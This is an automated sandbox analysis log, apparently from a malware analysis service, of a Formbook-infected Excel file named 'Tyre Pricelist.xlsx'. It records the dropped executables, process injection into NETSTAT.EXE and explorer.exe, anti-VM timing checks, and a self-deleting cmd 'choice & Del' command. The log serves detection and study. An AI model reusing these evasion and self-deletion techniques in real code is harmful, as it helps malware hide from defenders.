          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C500C4 NtCreateFile,LdrInitializeThunk,11_2_00C500C4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C507AC NtCreateMutant,LdrInitializeThunk,11_2_00C507AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F9F0 NtClose,LdrInitializeThunk,11_2_00C4F9F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F900 NtReadFile,LdrInitializeThunk,11_2_00C4F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_00C4FAD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_00C4FAE8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAB8 NtQueryValueKey,LdrInitializeThunk,11_2_00C4FAB8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_00C4FBB8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FB50 NtCreateKey,LdrInitializeThunk,11_2_00C4FB50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_00C4FB68
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_00C4FC60
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_00C4FDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FD8C NtDelayExecution,LdrInitializeThunk,11_2_00C4FD8C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_00C4FED0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FFB4 NtCreateSection,LdrInitializeThunk,11_2_00C4FFB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C510D0 NtOpenProcessToken,11_2_00C510D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50048 NtProtectVirtualMemory,11_2_00C50048
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50060 NtQuerySection,11_2_00C50060
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50078 NtResumeThread,11_2_00C50078
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C501D4 NtSetValueKey,11_2_00C501D4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C51148 NtOpenThread,11_2_00C51148
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C5010C NtOpenDirectoryObject,11_2_00C5010C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4F8CC NtWaitForSingleObject,11_2_00C4F8CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C51930 NtSetContextThread,11_2_00C51930
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4F938 NtWriteFile,11_2_00C4F938
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FA50 NtEnumerateValueKey,11_2_00C4FA50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FA20 NtQueryInformationFile,11_2_00C4FA20
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FBE8 NtQueryVirtualMemory,11_2_00C4FBE8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC90 NtUnmapViewOfSection,11_2_00C4FC90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50C40 NtGetContextThread,11_2_00C50C40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC48 NtSetInformationFile,11_2_00C4FC48
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC30 NtOpenProcess,11_2_00C4FC30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C51D80 NtSuspendThread,11_2_00C51D80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FD5C NtEnumerateKey,11_2_00C4FD5C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FEA0 NtReadVirtualMemory,11_2_00C4FEA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FE24 NtWriteVirtualMemory,11_2_00C4FE24
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FFFC NtCreateProcessEx,11_2_00C4FFFC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FF34 NtQueueApcThread,11_2_00C4FF34
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099D50 NtCreateFile,11_2_00099D50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099E00 NtReadFile,11_2_00099E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099E80 NtClose,11_2_00099E80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099F30 NtAllocateVirtualMemory,11_2_00099F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099D4B NtCreateFile,11_2_00099D4B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099DA4 NtCreateFile,11_2_00099DA4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099DFE NtReadFile,11_2_00099DFE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099E7A NtClose,11_2_00099E7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099F2B NtAllocateVirtualMemory,11_2_00099F2B
          Source: C:\Windows\SysWOW64\cmd.exe File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: Tyre Pricelist.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 00CA3F92 appears 108 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 00CA373B appears 238 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 00C5E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 00CCF970 appears 81 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 00C5DF5C appears 118 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0253E2A8 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0253DF5C appears 119 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 025AF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0258373B appears 244 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02583F92 appears 132 times
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: svchost[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@15/3@3/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Tyre Pricelist.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR167C.tmp
          Source: C:\Windows\SysWOW64\cmd.exe Console Write: C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exe Console Write: Access is denied
          Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Tyre Pricelist.xlsx Virustotal: Detection: 27%
          Source: Tyre Pricelist.xlsx ReversingLabs: Detection: 20%
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: unknown Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Tyre Pricelist.xlsx Static file information: File size 2481664 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: netstat.pdb source: RegAsm.exe, 00000006.00000002.2216733185.00000000002AC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, NETSTAT.EXE
          Source: Tyre Pricelist.xlsx Initial sample: OLE indicators vbamacros = False
          Source: Tyre Pricelist.xlsx Initial sample: OLE indicators encrypted = True
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_004169BB push esi; ret 6_2_004169BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0040AB07 push ds; retf 6_2_0040AB09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00414E05 push ss; retf 6_2_00414E06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEF2 push eax; ret 6_2_0041CEF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEFB push eax; ret 6_2_0041CF62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEA5 push eax; ret 6_2_0041CEF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CF5C push eax; ret 6_2_0041CF62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253DFA1 push ecx; ret 6_2_0253DFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BE3E6 pushad ; ret 6_2_008BE3E7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5DFA1 push ecx; ret 11_2_00C5DFB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_000969BB push esi; ret 11_2_000969BC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0008AB07 push ds; retf 11_2_0008AB09
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00094E05 push ss; retf 11_2_00094E06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEA5 push eax; ret 11_2_0009CEF8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEFB push eax; ret 11_2_0009CF62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEF2 push eax; ret 11_2_0009CEF8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CF5C push eax; ret 11_2_0009CF62
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86101767821
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Tyre Pricelist.xlsxStream path 'EncryptedPackage' entropy: 7.99990874269 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409A80 rdtsc 6_2_00409A80
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2852Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1028Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2792Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2195930898.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2190381615.0000000000946000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_02530048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD mov ecx, dword ptr fs:[00000030h]4_2_002F00AD
